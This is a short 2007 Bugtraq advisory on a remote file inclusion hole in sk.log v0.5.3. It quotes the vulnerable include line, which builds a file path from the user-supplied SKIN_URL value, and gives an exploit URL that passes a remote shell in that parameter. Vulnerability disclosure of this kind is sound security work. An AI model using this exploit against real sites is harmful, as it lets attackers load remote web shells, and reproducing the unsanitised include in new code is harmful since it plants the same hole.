[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
sk.log v0.5.3 Remote File Inclusion
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: sk.log v0.5.3 Remote File Inclusion
- From: h3llcode@xxxxxxxxxx
- Date: 24 Sep 2007 21:09:41 -0000
++++++++++++++++++++++++++++++++++++++++++++++++++
+ sk.log v0.5.3 Remote File Inclusion
+ High Risk
+ Found by Seph1roth
+ http://blackroots.it
++++++++++++++++++++++++++++++++++++++++++++++++++
+ Vulnerable Code
+ log.inc.php
+ include_once( "$SKIN_URL/php/logdisplay.inc.php" );
+ Exploit
/php-inc/log.inc.php?SKIN_URL=[Shell]
+ Script Download
http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip